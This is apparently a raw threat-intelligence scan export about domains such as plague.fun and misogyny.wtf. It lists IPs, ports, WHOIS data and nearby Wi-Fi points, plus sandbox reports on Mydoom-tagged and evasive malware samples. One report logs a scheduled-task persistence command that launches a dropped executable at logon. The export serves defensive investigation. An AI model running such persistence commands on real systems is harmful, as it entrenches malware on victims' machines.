37.7803446,-122.3906132 2022-12-18 00:13:04 Affiliate Description - Category No DuckDuckGo 0 0 3 0 None Orange S.A. lfbn-nic-1-332-104.w90-116.abo.wanadoo.fr 2022-12-18 00:23:19 Country No Country Name Extractor 0 1 2 0 None Switzerland Zurich, Zurich, 8000, Switzerland, Europe 2022-12-18 00:19:20 Raw Data from RIRs No Hybrid Analysis 0 0 3 0 None [{u'subsystem': None, u'classification_tags': [u'mydoom', u'upx'], u'crowdstrike_ai': None, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [u'17.172.224.47', u'209.202.251.1'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'document.cmd', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-4', u'name': u'Creates a writable file in a temporary directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"" created file "%TEMP%\\zincite.log"\n "" created file "%TEMP%\\tmpC968.tmp"\n "" created file "%TEMP%\\tmpC968.tmp\\:Zone.Identifier:$DATA"\n "" created file "%TEMP%\\tmpC9E1.tmp"\n "" created file "%TEMP%\\tmpC9E1.tmp\\:Zone.Identifier:$DATA"\n "" created file "%TEMP%\\tmpCA46.tmp"\n "services.exe" created file "%TEMP%\\zincite.log"\n "services.exe" created file "%TEMP%\\cd9dSmjhn.log"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"216.97.88.9:25"\n "17.151.62.66:25"\n "17.151.62.68:25"\n "17.151.62.67:25"\n "17.171.2.60:25"\n "212.227.17.8:25"\n "212.227.15.17:25"\n "82.165.230.17:25"\n "193.175.80.161:25"\n "17.171.2.72:25"\n "17.171.2.68:25"\n "17.172.224.47:25"\n "217.12.15.96:80"\n "209.202.251.1:80"\n "162.209.107.11:25"\n "144.76.235.113:25"\n "192.153.166.6:25"\n "64.79.149.147:25"\n 
"74.208.5.20:25"\n "74.208.5.22:25"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IESQMMUTEX_0_208"\n "RasPbFile"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!IETld!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!kcpmawt!appdata!roaming!microsoft!windows!ietldcache!"\n "\\Sessions\\1\\BaseNamedObjects\\IESQMMUTEX_0_191"\n "\\Sessions\\1\\BaseNamedObjects\\RasPbFile"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZoneAttributeCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\_!MSFTHISTORY!_"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!kcpmawt!appdata!roaming!microsoft!windows!cookies!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!kcpmawt!appdata!local!microsoft!windows!history!history.ie5!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\WininetStartupMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\WininetConnectionMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\WininetProxyRegistryMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\c:!users!kcpmawt!appdata!local!microsoft!windows!temporary internet files!content.ie5!"\n "Local\\_!MSFTHISTORY!_"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-2', u'name': u'GETs files from a webserver', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /web/results?q=mailto+j3e.de&kgs=0&kls=0&nbq=50 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 
[remaining raw HTTP request dump omitted] 81.88.48.101
2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 172.67.137.37
2022-12-18 00:06:51 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.137.37:443 172.67.137.37
2022-12-18 00:21:37 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Wed, 02 Nov 2022 16:43:18 GMT ETag: W/"44-1843939c80b" Content-Type: text/html; charset=UTF-8 Content-Length: 68 Date: Connection: keep-alive Keep-Alive: timeout=5 20.226.83.185
2022-12-18 00:03:39 Malicious Internet Name Yes CloudFlare Malware DNS 0 1 1 0 None Blocked by CloudFlare DNS [misogyny.wtf] misogyny.wtf
2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:8880 188.114.96.1
2022-12-18 00:20:59 Raw Data from RIRs No Censys 0 0 2 0 None [raw Censys host record JSON omitted]
2606:4700:3033::6815:1cf0 2022-12-18 00:23:19 Country No Country Name Extractor 0 0 5 0 None Italy Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-01-13T08:14:30Z Creation Date: 2010-01-12T13:36:45Z Registry Expiry Date: 2023-01-12T13:36:45Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:22:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. 
VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-02-14T00:00:00Z Creation Date: 2010-01-12T00:00:00Z Registrar Registration Expiration Date: 2023-01-12T00:00:00Z Registrar: REGISTER S.P.A. 
Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:22:21Z <<< For more information on Whois status codes, please visit https://icann.org/epp
2022-12-18 00:04:01 Country No Country Name Extractor 0 0 4 0 None United States googleusercontent.com
2022-12-18 00:12:22 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [raw Hybrid Analysis result JSON omitted] 188.114.97.3
2022-12-18 00:21:37 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 200 OK Server: Werkzeug/2.2.2 Python/3.9.11 Date: Content-Type: text/html; charset=utf-8 Content-Length: 29 Connection: close 20.226.83.185
2022-12-18 00:02:50 Domain Registrar No Whois 0 0 1 0 None ENOM, INC. plague.fun
2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None LF-X1U.00014A10EF0C (Net ID: 00:01:4A:10:EF:0C) 37.7803446,-122.3906132
2022-12-18 00:06:35 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.97.0:443 188.114.97.0
2022-12-18 00:11:19 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None wasp.plague.fun [raw urlscan.io result JSON omitted]
2022-12-18 00:03:08 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.196 34.149.204.188
2022-12-18 00:14:47 Internet Name - Unresolved No VirusTotal 0 0 1 0 None api.plague.fun plague.fun
2022-12-18 00:12:26 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NJ', u'country_tld': u'.us', u'ip': u'2606:4700:3031::6815:7b3', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', 
u'city': u'Newark', u'network': u'2606:4700:3030::/44', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 40.7641, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'CLOUDFLARENET', u'postal': u'07104', u'asn': u'AS13335', u'country': u'US', u'region': u'New Jersey', u'longitude': -74.1654, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} 2606:4700:3031::6815:7b3 2022-12-18 00:23:30 URL (Uses Javascript) No Page Information 0 0 3 0 None http://webmail.zerotwo-best-waifu.online Not configured webmail
2022-12-18 00:08:42 Raw Data from RIRs No LeakIX 0 0 1 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'51.103.210.236', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'asn': 8075, u'network': u'51.103.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': [{u'version': u'3.10.6', u'name': u'Python', u'fingerprint': u''}], u'version': u'2.2.2', u'os': u'', u'name': u'Werkzeug', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c95e97940ac8d25d76ee211a43b58648d1fa36ee91fa36ee95c9f5d60', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'94', u'server': u'Werkzeug/2.2.2 Python/3.10.6'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'CH-ZH', u'country_iso_code': u'CH', u'city_name': u'Zurich', u'location': {u'lat': 47.3682, u'lon': 8.5671}, u'country_name': u'Switzerland', u'continent_name': u'Europe', u'region_name': u'Zurich'}, u'host': u'51.103.210.236', u'summary': u'Server: Werkzeug/2.2.2 Python/3.10.6\r\nDate: Fri, 18 Nov 2022 14:31:44 GMT\r\nContent-Type: text/html; 
charset=utf-8\r\nContent-Length: 94\r\nConnection: close\r\n\n\nRoses are red\n\nViolets are blue\n\nWasp is happy\n
\nBecause he grabbed you', u'time': u'2022-11-18T14:31:43.869626235Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'51.103.210.236', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'asn': 8075, u'network': u'51.103.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': [{u'version': u'3.10.6', u'name': u'Python', u'fingerprint': u''}], u'version': u'2.2.2', u'os': u'', u'name': u'Werkzeug', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c95e97940ac8d25d76ee211a43b58648d1fa36ee91fa36ee95c9f5d60', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'94', u'server': u'Werkzeug/2.2.2 Python/3.10.6'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'CH-ZH', u'country_iso_code': u'CH', u'city_name': u'Zurich', u'location': {u'lat': 47.3682, u'lon': 8.5671}, u'country_name': u'Switzerland', u'continent_name': u'Europe', u'region_name': u'Zurich'}, u'host': u'51.103.210.236', u'summary': u'Server: Werkzeug/2.2.2 Python/3.10.6\r\nDate: Mon, 28 Nov 2022 18:36:21 GMT\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 
94\r\nConnection: close\r\n\n\nRoses are red\n\nViolets are blue\n\nWasp is happy\n
\nBecause he grabbed you', u'time': u'2022-11-28T18:36:21.778535407Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'51.103.210.236', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'asn': 8075, u'network': u'51.103.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': [{u'version': u'3.10.6', u'name': u'Python', u'fingerprint': u''}], u'version': u'2.2.2', u'os': u'', u'name': u'Werkzeug', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c95e97940ac8d25d76ee211a43b58648d1fa36ee91fa36ee95c9f5d60', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'94', u'server': u'Werkzeug/2.2.2 Python/3.10.6'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'CH-ZH', u'country_iso_code': u'CH', u'city_name': u'Zurich', u'location': {u'lat': 47.3682, u'lon': 8.5671}, u'country_name': u'Switzerland', u'continent_name': u'Europe', u'region_name': u'Zurich'}, u'host': u'51.103.210.236', u'summary': u'Server: Werkzeug/2.2.2 Python/3.10.6\r\nDate: Wed, 09 Nov 2022 04:11:29 GMT\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 
94\r\nConnection: close\r\n\n\nRoses are red\n\nViolets are blue\n\nWasp is happy\n
\nBecause he grabbed you', u'time': u'2022-11-09T04:11:29.103899396Z'}], u'Leaks': None} 51.103.210.236 2022-12-18 00:09:46 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.17:8443 188.114.96.0/24 2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77a6a5060eda22f8-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.28.240 2022-12-18 00:03:13 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-97.w90-116.abo.wanadoo.fr 90.116.166.97 2022-12-18 00:08:30 Physical Location No LeakIX 0 0 1 0 None United States plague.fun 2022-12-18 00:12:19 Physical Location No ipapi.co 0 0 2 0 None Toronto, Ontario, ON, Canada, CA 172.67.190.129 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None CATYLN (Net ID: 00:01:38:86:06:1F) 37.7803446,-122.3906132 2022-12-18 00:12:41 Physical Location No ipapi.co 0 0 2 0 None Toronto, Ontario, ON, Canada, CA 172.67.169.215 2022-12-18 00:08:42 Internet Name No DNS Resolver 0 0 2 0 None www.zerotwo-best-waifu.online [{u'not_after': u'2022-09-18T23:59:59', u'not_before': u'2022-06-20T00:00:00', u'issuer_ca_id': 158800, u'name_value': u'www.zerotwo-best-waifu.online\nzerotwo-best-waifu.online', u'issuer_name': u'C=AT, O=ZeroSSL, CN=ZeroSSL RSA Domain Secure Site CA', u'common_name': u'zerotwo-best-waifu.online', u'serial_number': u'41cf04f8c0f27bcd70733fd3405fa0ad', 
u'entry_timestamp': u'2022-06-20T00:27:23.743', u'id': 6969470177}, {u'not_after': u'2022-09-18T23:59:59', u'not_before': u'2022-06-20T00:00:00', u'issuer_ca_id': 158800, u'name_value': u'www.zerotwo-best-waifu.online\nzerotwo-best-waifu.online', u'issuer_name': u'C=AT, O=ZeroSSL, CN=ZeroSSL RSA Domain Secure Site CA', u'common_name': u'zerotwo-best-waifu.online', u'serial_number': u'41cf04f8c0f27bcd70733fd3405fa0ad', u'entry_timestamp': u'2022-06-20T00:27:22.018', u'id': 6969470113}] 2022-12-18 00:03:24 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-114.w90-116.abo.wanadoo.fr 90.116.166.114 2022-12-18 00:14:47 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.160:80 188.114.96.0/24 2022-12-18 00:02:50 IPv6 Address No Mnemonic PassiveDNS 13 0 1 0 None 2a06:98c1:3120::1 misogyny.wtf 2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 172.67.190.129 2022-12-18 00:06:52 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': u'Windows Gui', u'classification_tags': [u'evasive'], u'crowdstrike_ai': None, u'total_processes': 7, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': 5, u'submit_name': u'tmp7h3r2oo1', u'signatures': [{u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES"; Key: "")\n "google.exe" (Path: 
"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES"; Key: "")\n "google.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS"; Key: "")\n "google.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS"; Key: "")'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-101', u'name': u'Found API related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, 
u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"CorExitProcess" (Indicator: "ExitProcess")\n "FlsSetValue" (Indicator: "FlsSetValue")\n "FlsGetValue" (Indicator: "FlsGetValue")\n "GetLastActivePopup" (Indicator: "GetLastActivePopup")\n "GetActiveWindow" (Indicator: "GetActiveWindow")\n "MessageBoxW" (Indicator: "MessageBoxW")\n "ShellExecuteA" (Indicator: "ShellExecuteA")\n "CreateFileA" (Indicator: "CreateFileA")\n "FindResourceA" (Indicator: "FindResourceA")\n "FreeLibrary" (Indicator: "FreeLibrary")\n "LoadResource" (Indicator: "LoadResource")\n "WriteFile" (Indicator: "WriteFile")\n "SizeofResource" (Indicator: "SizeofResource")\n "GetProcAddress" (Indicator: "GetProcAddress")\n "LoadLibraryA" (Indicator: "LoadLibraryA")\n "LockResource" (Indicator: "LockResource")\n "CloseHandle" (Indicator: "CloseHandle")\n "GetWindowsDirectoryA" (Indicator: "GetWindow")\n "GetTempPathA" (Indicator: "GetTempPathA")\n "SHGetSpecialFolderPathA" (Indicator: "SHGetSpecialFolderPathA")'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-80', u'name': u'PE file contains executable sections', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"8ae28c30669d3cffca54e317362a0774438ab3fb859418eeb826e57823a5faf0.bin" has an executable section named ".text"\n "google.exe" has an executable section named ".text"\n "BARBECUE.EXE" has an executable section named ".text"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-26', u'name': u'The input sample possibly contains the RDTSCP instruction', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1497', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1497', u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Found VM detection artifact "RDTSCP trick" in 
"8ae28c30669d3cffca54e317362a0774438ab3fb859418eeb826e57823a5faf0.bin" (Offset: 2748387)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-3', u'name': u'Runs shell commands', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1059/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1059.003', u'relevance': 5, u'threat_level': 0, u'type': 9, u'description': u'"/c schtasks /create /f /sc onlogon /rl highest /tn "google" /tr \'"%APPDATA%\\google.exe"\' & exit" on 2022-10-14.19:33:01.000\n "/c ""%TEMP%\\tmp138A.tmp.bat""" on 2022-10-14.19:34:00.593'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-120', u'name': u'Contains registry location strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"Software\\"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-96', u'name': u'PE file entrypoint instructions', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"8ae28c30669d3cffca54e317362a0774438ab3fb859418eeb826e57823a5faf0.bin" file has an entrypoint instructions - "call0x405173,jmp0x4030db,movedi, edi,pushebp,movebp, esp,subesp, 0x20,moveax, dword ptr [ebp + 